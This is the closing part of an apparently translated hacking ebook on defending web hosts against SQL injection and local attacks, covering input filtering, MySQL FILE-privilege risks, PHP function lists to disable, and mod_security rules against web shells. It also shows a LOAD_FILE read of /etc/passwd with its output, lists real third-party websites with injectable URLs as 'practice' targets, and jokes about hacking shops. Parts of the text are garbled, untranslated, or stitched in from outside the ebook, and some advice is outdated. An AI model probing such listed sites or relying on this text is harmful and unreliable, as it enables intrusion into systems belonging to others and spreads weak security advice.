Note that the usual packet-filtering firewalls cannot protect you if you are attacked by SQL Injection. They are not smart enough to recognise the signs of the attack, since by nature this attack is caused by an application bug. So defending against it needs specific techniques, mainly hardening the vulnerable application. Let us look at some methods in turn:

Limiting bug detection:
Attackers rely on errors in application programming to attack, and they may rely on the signs that reveal a vulnerable application. So hiding those signs, making them harder to read or removing them is used by most security experts. Note that this technique only hides the bug; the bug in the application is still there; it only counters easy detection of the bug by bad actors.

But skilled attackers can still see through this kind of defence. It can fend off simple attacks such as adding a ' (quote) to the end of the URL, because the way such attacks find vulnerable applications relies on the signals returned by the application or directly from the database. We can return only generic messages or redirect to the home page. In this case, finding the bug and identifying the target becomes extremely hard for the attacker.

However, attackers keep creating ever more sophisticated and better bug-finding techniques to determine the returned signals indirectly. This kind of attack is called Blind SQL Injection, as discussed above.

Defending from outside:
This solution uses a special firewall to protect you from applications accessing the database with malicious intent. Note that the attacker interacts with the web application through a browser over a remote connection. The application then sends requests to the database. So we can block attacks between the attacker and the application, between the application and the database, and even on the database itself.
Some defensive measures that can be implemented:

Filters, scanners and database access controls make a web application harder to attack.

Improving input data:
The real defence against SQL Injection is validating and correcting the queries. As mentioned, this bug is due to the application not checking user input. So the user can change or edit parameters, or even add a query entity into the statement. Therefore all user input must be monitored and subject to certain constraints.

First, the application needs to classify the types of input. For example, if the application requires numeric input, then when it receives input it should accept nothing other than numbers. Some PHP check functions:
is_numeric($str): checks whether $str is numeric
is_int($str): checks for an integer
is_float($str): checks for a floating-point number
...

Second, if the type of input is unclear, then at least determine which types are not allowed. In this case we must filter out quotes, commands and special characters. Some filtering of data can be done across the whole application (e.g. never storing data with quotes in the database) and for some input types (e.g. no ',' in an email address).
Example:
magic_quotes_gpc (GPC = GET, POST, COOKIE)

It checks data of those 3 kinds and, when it finds a ' (single quote), " (double quote) or \ (backslash), automatically adds a \ (backslash) right before it:
<?php
echo get_magic_quotes_gpc(); // 1
echo $_POST['lastname']; // O\'reilly
echo addslashes($_POST['lastname']); // O\\\'reilly

if (!get_magic_quotes_gpc()) {
$lastname = addslashes($_POST['lastname']);
} else {
$lastname = $_POST['lastname'];
}

echo $lastname; // O\'reilly
$sql = "INSERT INTO lastnames (lastname) VALUES ('$lastname')";
?>

When writing a database-oriented application, or when deploying an open-source application, pay attention to such issues and design proper input validation. This measure will help protect you from SQL Injection attacks so you do not become prey for attackers.

Understanding this defence is very important if you are deploying a commercial application. Just remember that developers can make mistakes when programming, and you will have to take steps to fix those bugs. And do this even when no vulnerability has yet been published for that application.

Conclusion:
For an application to really avoid SQL Injection attacks, it needs the following:
i. Do not return error pages containing sensitive information.
ii. The better the input data is sanitised, the more likely attacks are eliminated.
iii. Restrict query privileges as much as possible.
iv. Regularly check and scan the application with the latest tools.
v. Use the best barrier possible for each interaction layer. For example: set up 2 or 3 layers of passwords for the admin link with .htaccess.
vi:
- Encrypt information; you can encrypt information so that theft of your important information is rendered useless.
- CHMOD correctly; the following steps are very important for defending against Local attacks, so I suggest you do them exactly:
+ CHMOD the public_html directory to 710 instead of the default 750; this helps protect the structure of your website.
+ CHMOD directories to 701 and try never to CHMOD 777; for some unimportant folders you can CHMOD 755 so that the folder's contents display correctly and completely.
- Note: some servers support CHMOD 101 on directories; if your server supports it, use it, because this CHMOD is very safe; even the Owner cannot view the folder structure, even over FTP.
- CHMOD files to 604 and remember never 666; if something needs 666, CHMOD it temporarily for that moment and CHMOD it back right away. On servers that support CHMOD 404 on files, use that.
- Do not want anyone peeking at your admincp? Simply turn it off. A new protection mechanism, based on the CHMOD feature of Linux servers, works as follows:
You create 2 files, one to open admincp and one to close admincp.

Code of the opening file, named on.php:
<?php
// restore the admincp entry point so it can be served
chmod('/home/hoiquantinhoc.com/public_html/m/r/n/2/admincp/index.php', 0701);
?>

Code of the closing file, named off.php:
<?php
// remove every permission bit so the entry point cannot be read or served
chmod('/home/hoiquantinhoc.com/public_html/m/r/n/2/admincp/index.php', 0000);
?>

So, after logging in to admincp you need to open the link to on.php; only then is admincp opened --> log in. When the session is over, open the link to off.php and admincp closes automatically. This saves time; there is no need to log into the Control Panel to CHMOD the directory.
- Change the structure and default names of files containing important information. If possible, change the database structure too, if you can.
- Configure .htaccess so that only the Admin's IP can access admincp, and the admin must use SSH to connect to the server to edit things in admincp.
- To be more careful, you can download the admincp index file and delete that index file from the host! When you need it, upload the index file; when done, delete it again.
- Set up Admin access firewalls that do not use the database, encrypt User/Pass as well as possible, and have a system that checks the actions of Mods and Admins so they are only performed if the permission is confirmed (Matrix uses this very successfully). The above is a step-by-step guide to help you defend against Local attacks; it is only a basic guide; in practice, be a bit more flexible, and if you have new ideas let's discuss them together. Hopefully this article helps Admins secure their forums better.

Further references:
http://hieupc.com/joomla/bao-mat-website-joomla/134-chong-tan-cong-sql-injection.html
Preventing SQL Injections (author: Anthony Ferrara - Joomla Core Team, original article in English)
SQL Injection
2. Preventing Local Hack:
Securing MySQL:
MySQL, as we know, is a very popular DBMS, broadly divided into 4 editions:
* MySQL Standard includes the standard storage engine, as well as the InnoDB storage engine, which is touted as a transaction-safe, ACID-compliant database with some additional features over the standard version.
* MySQL Pro is the commercial version.
* MySQL Max includes the more technologically advanced features that are available during early access programs.
* MySQL Classic is the standard storage engine without the InnoDB engine. This is another commercial version.

The MySQL development team, wanting to improve MySQL's usability, added some functions that carry a potential risk for server security.
Have we heard of the local hack technique via mysql?
Look at the following example:
(assume the attacker has a mysql user with rights to create, edit, insert and delete databases on the server)
- Run this series of statements:
use attacker;
CREATE TABLE readfile (text LONGTEXT);
INSERT INTO readfile VALUES (LOAD_FILE('/etc/passwd'));

And the result is:
root:0:0:root:/root:/bin/bash
bin:1:1:bin:/bin:/sbin/nologin
daemon:2:2:daemon:/sbin:/sbin/nologin
adm:3:4:adm:/var/adm:/sbin/nologin
lp:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:5:0:sync:/sbin:/bin/sync
shutdown:6:0:shutdown:/sbin:/sbin/shutdown
halt:7:0:halt:/sbin:/sbin/halt
mail:8:12:mail:/var/spool/mail:/sbin/nologin
news:9:13:news:/etc/news:
uucp:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:11:0:operator:/root:/sbin/nologin
games:12:100:games:/usr/games:/sbin/nologin
gopher:13:30:gopher:/var/gopher:/sbin/nologin
ftp:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:99:99:Nobody:/:/sbin/nologin
vcsa:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:37:37::/var/lib/rpm:/sbin/nologin
netdump:34:34:Network Crash Dump user:/var/crash:/bin/bash

Some of you may wonder why a server that has been carefully hardened, with php safe_mode ON, open_basedir set and functions disabled, can still be hacked locally. Very possibly the server administrator forgot about and neglected mysql. So our task is to find the risks arising from mysql's convenience features, from the customer's point of view (assume you administer a shared hosting server) to see whether they really need those features, and what an attacker would do once they have a mysql user; then we deploy solutions to limit and prevent this risk.
Let us review mysql's functions. Which of them carries the greatest security risk?
MySQL has 3 features able to manipulate files: load_file(), load data infile and dumpfile.
First, look at the load_file() function;
Ham nay co cu phap nh sau :
LOAD_FILE(file_name)

Cng dng cua ham nay la oc va tra v gia tri cua file nh mt chui . Xem manual page cua
mysql ,ban se thy ham nay cn vai iu kin co th thc thi:
To use this function, the file must be located on the server host, you must specify the full pathname to the file, and
you must have the FILE privilege. The file must be readable by all and its size less than max_allowed_packet bytes.

Hy t minh di goc cua mt customer thu host bnh thng, khi ho mun thao tac file co
th xay ra 2 trng hp :
1 dung php or perl ,cgi ,asp manipulate
2 la dung Ftp chinh sa trc tip

Nh trn ta thy c th oc c file qua MySQL th account phai c quyn FILE privilege
v file mun oc phai c quyn read ( c phep oc ). Da vao o ta co 2 cach ngn chn
vic truy xut file tri php :
+chmod file: khng c quyn read nhm group v world, cch chmod ti hay p dng l 401 (
|r--|---|--x| ), thc hin chinh sa file ban nn thc hin trong Control Panel hoc qua FTP.
+cm FILE privilege cua tt ca cc user trong MySQL.

So the FILE privilege is entirely unnecessary for an ordinary user. To block the risk from load_file(), you simply disable the FILE privilege for every user in MySQL.
LOAD DATA [LOW_PRIORITY | CONCURRENT] [LOCAL] INFILE 'file_name'
[REPLACE | IGNORE]
INTO TABLE tbl_name
[FIELDS
[TERMINATED BY 'string']
[[OPTIONALLY] ENCLOSED BY 'char']
[ESCAPED BY 'char']
]
[LINES
[STARTING BY 'string']
[TERMINATED BY 'string']
]
[IGNORE number LINES]
[(col_name,...)]

(this article assumes you already know MySQL; we will not discuss syntax or usage here)
This statement serves the same purpose as load_file() but runs considerably faster. It also has the extra keyword LOCAL. When LOCAL is added to the query, MySQL reads the file on the client and sends it to the server. Most servers today are set to localhost, so whether or not LOCAL is used does not matter much. Let us glance at the conditions under which this statement can run:

For security reasons, when reading text files located on the server, the files must either reside in the database
directory or be readable by all. Also, to use LOAD DATA INFILE on server files, you must have the FILE
privilege.

Again the golden key is the FILE privilege: by removing it you can block MySQL's ability to read files.
DUMPFILE is rarely allowed by any server, so we will not discuss it.
Conclusion:
MySQL is a truly powerful DBMS thanks to its convenience and capability, but some of its overly convenient functions become latent risks for an attacker to exploit. Hopefully after this little article you can raise the security level of your system. I welcome everyone's comments on any shortcomings.
Securing the Host:
As you know, PHP shells such as r57 and c99 can "wreak havoc" on the hosting accounts on the same server because they rely on "sensitive" functions in PHP. So the first thing to do to neutralize these shells is to turn off those sensitive functions. Of course you need to study which "sensitive" functions those shells use.
To turn those functions off, you should run PHP in safe_mode (safe_mode = On), then disable functions such as:
system, exec, shell_exec, passthru, pcntl_exec, putenv, proc_close, proc_get_status, proc_nice, proc_open,
proc_terminate, popen, pclose, set_time_limit, ini_alter, virtual, openlog, escapeshellcmd, escapeshellarg, dl,
curl_exec, parse_ini_file, show_source

However, if you are a hosting provider you usually run PHP under suPHP so that you can easily identify which account runs each PHP process. Because of that, many hackers can use a php.ini file to turn those functions back on.

So the next job is to lock down the ability to use a custom php.ini. You can lock it in the suPHP configuration. There are other ways too, depending on the individual.

OK, that can be called one stage done. The next very important item to cover is Mod Security, an add-on for cPanel.

This part only gives basic examples of configuring a Security Rule; the topic is quite broad, and everyone has their own config.
Example:
SecRule REQUEST_URI "/r57en\.php"
SecRule REQUEST_URI "\.php\?act=(chmod&f|cmd|f&f=|ls|img&img=)"

The above is only my own opinion on the problem of preventing local hacking with PHP shells; let me pause this part for a problem that cannot be forgotten or skipped: shells that run on Perl, such as cgitelnet.pl, WebShell.cgi, ... In local hacking, Perl shells are no less capable than PHP shells; one could say they are very powerful.
As discussed above, if you do not want to use Perl any more, remove it:
login as root
apt-get remove perl




If instead you want to stop Perl from running .cgi and .pl files on a particular site, you only need to configure that website's .conf file:

<Directory /home/websitecuaban/cgi-bin>
allow from all
</Directory>
Guide to preventing symlink attacks:
Symlink: a symbolic link, a reference to a file or a directory, similar to creating a shortcut in Windows.
This feature has been used recently to carry out local attacks and is very hard to prevent.
To partly remedy this situation you can chmod your files and folders:
- for files, chmod 404 ( r-----r-- )
- for folders, chmod 701 ( rwx-----x )

Create a .htaccess file with the following content:
<Files "config.php">
Order Deny,Allow
Deny from All
</Files>
Upload this file as /home/username/.htaccess so that it takes effect for the whole website. In the <Files "config.php"> part you can change the name to the file you need to protect.
With root on the server you should chmod 700 the symlink file in /bin/symlink. Set safe_mode=ON and disable some unnecessary functions in php.ini:
system, exec, shell_exec, passthru, pcntl_exec, putenv, proc_close, proc_get_status, proc_nice, proc_open,
proc_terminate, popen, pclose, set_time_limit, ini_alter, virtual, openlog, escapeshellcmd, escapeshellarg, dl,
curl_exec, parse_ini_file, show_source,ini_set, ini_alter, symlink
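An added Python audit (not the ebook's own code) that serves both this list and the earlier "Securing the Host" list: it parses a php.ini text and reports whether safe_mode is On, which of the listed functions are still callable, and the corrected disable_functions line. The php.ini fragment is constructed.

```python
"""Check a php.ini against the hardening this ebook recommends: safe_mode = On
and the listed functions in disable_functions. Added example, not the ebook's
own code; SAMPLE_PHP_INI is a constructed fragment, not a real server config."""

# The ebook's list from the Symlink section (it extends the earlier
# 'Securing the Host' list with ini_set, ini_alter and symlink).
DANGEROUS_FUNCTIONS = {
    "system", "exec", "shell_exec", "passthru", "pcntl_exec", "putenv",
    "proc_close", "proc_get_status", "proc_nice", "proc_open", "proc_terminate",
    "popen", "pclose", "set_time_limit", "ini_alter", "virtual", "openlog",
    "escapeshellcmd", "escapeshellarg", "dl", "curl_exec", "parse_ini_file",
    "show_source", "ini_set", "symlink",
}

# Constructed php.ini fragment: safe_mode off and only a partial disable list.
SAMPLE_PHP_INI = """
; constructed sample, not a real server's configuration
safe_mode = Off
disable_functions = "system, exec, shell_exec, passthru, popen"  ; partial list
"""


def parse_php_ini(text):
    """Minimal php.ini reader: one 'key = value' per line, ';' starts a comment,
    surrounding quotes are stripped. [sections] and includes are ignored."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if "=" not in line or line.startswith("["):
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        settings[key] = value.strip('"')
    return settings


def audit_php_ini(text):
    """Return the safe_mode state, the listed functions still callable, and the
    disable_functions line that would close the gap. Note: safe_mode was removed
    in PHP 5.4, so on current PHP only the disable_functions part still applies."""
    settings = parse_php_ini(text)
    disabled = {f.strip() for f in settings.get("disable_functions", "").split(",") if f.strip()}
    still_enabled = sorted(DANGEROUS_FUNCTIONS - disabled)
    return {
        "safe_mode_on": settings.get("safe_mode", "Off").lower() in ("on", "1"),
        "still_enabled": still_enabled,
        "fixed_line": "disable_functions = " + ",".join(sorted(DANGEROUS_FUNCTIONS | disabled)),
    }
```

Remember that under suPHP a per-account php.ini can override these values, so the lock-down of custom php.ini files described earlier is what makes the audited values binding.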
Use mod_security and add the rules:
SecFilterSelective THE_REQUEST "cgitelnet"

SecFilter "a=login&p="
SecFilter "a=command&d=(.*)&c="
SecFilterSelective THE_REQUEST "\?a=(up|down)load&d="
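An added example (not the ebook's code) that runs the rule patterns from both mod_security lists on this page against constructed request lines, to show what they catch and one false positive the unanchored `a=login&p=` pattern produces. It only approximates the engine: Python's re stands in for PCRE, and ModSecurity's phases and actions are not modelled.

```python
"""Emulate the ebook's mod_security patterns over constructed request lines.
Added example, not the ebook's code; the patterns are copied unchanged from
the two rule lists in this ebook and the request lines are constructed."""
import re

# (variable, pattern): REQUEST_URI covers path and query string; THE_REQUEST
# (and the old SecFilter form) sees the whole request line.
RULES = [
    ("REQUEST_URI", r"/r57en\.php"),
    ("REQUEST_URI", r"\.php\?act=(chmod&f|cmd|f&f=|ls|img&img=)"),
    ("THE_REQUEST", r"cgitelnet"),
    ("THE_REQUEST", r"a=login&p="),
    ("THE_REQUEST", r"a=command&d=(.*)&c="),
    ("THE_REQUEST", r"\?a=(up|down)load&d="),
]


def matching_rules(request_line):
    """Return the patterns that fire for one HTTP request line ('METHOD URI VERSION')."""
    parts = request_line.split(" ")
    uri = parts[1] if len(parts) > 1 else request_line
    hits = []
    for variable, pattern in RULES:
        target = uri if variable == "REQUEST_URI" else request_line
        if re.search(pattern, target):
            hits.append(pattern)
    return hits


# Constructed request lines: a normal page view, two shell-style requests, and a
# legitimate query that the unanchored 'a=login&p=' pattern still matches.
SAMPLE_REQUESTS = [
    "GET /index.php?act=News&id=12 HTTP/1.1",
    "GET /tmp/r57en.php HTTP/1.1",
    "POST /cgi-bin/cgitelnet.pl?a=login&p= HTTP/1.1",
    "GET /index.php?data=login&p=3 HTTP/1.1",   # false positive: 'data=login&p=' contains 'a=login&p='
]


def scan(requests):
    """Map each request line to the rules it triggers; empty list means it passes."""
    return {line: matching_rules(line) for line in requests}


if __name__ == "__main__":
    for line, hits in scan(SAMPLE_REQUESTS).items():
        print(f"{line!r}: {hits or 'pass'}")
```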







3. SQL Injection practice:
Website source and database
http://www.4shared.com/file/54599762...ified=37fd68a6

Acunetix software
http://www.4shared.com/file/54601066...Acunectix.html

Guide to installing MS SQL 2000
http://www.4shared.com/file/54608235...ified=37fd68a6

Preparation:
Install MS SQL 2000
Install IIS
Allow ASP extensions
Copy the Visic source to the wwwroot directory
Open the source, find the include directory and change the common.inc file
Attach the database.
Run the website on localhost and try exploiting it.
A few sites to practise hacking on:
http://beertiger.com/index.php?act=News&id=12'
http://www.computersvietnam.com/index.php?act=News&id=12
http://www.golfnyc.com/golf/ecom_v2/ecom.php?cat=2765
---------------------------------------------THE END---------------------------------------------
Thank you, readers, for reading this ebook; it may be the last of Hieupc's efforts in the Hacking Ebook genre, and perhaps later I will write about a different topic. I only hope you understand this: hacking is about learning, sharing experience with one another and improving your knowledge; in truth, the ways of hacking from the past to now are only the few common types above, and what matters is whether you are willing to learn and improve your knowledge through books, newspapers and the internet. The articles above are only the basics; apply the theory in practice, friends (if you hack many shops, share a little with hieupc, hihi, just kidding).
Please keep the author credit: Hieupc if you intend to copy/leech this information. Many thanks.
Hieupc's motto: Give and you will receive more; do not be too harsh on yourself, and do many good things and good things will come to you.
From now on Hieupc is going vegetarian; it has been three days already, and hopefully it will help in some way. The ebook ends here. Wish you a happy life.
---------------------------------------------THE END---------------------------------------------
AUTHOR: HIEUPC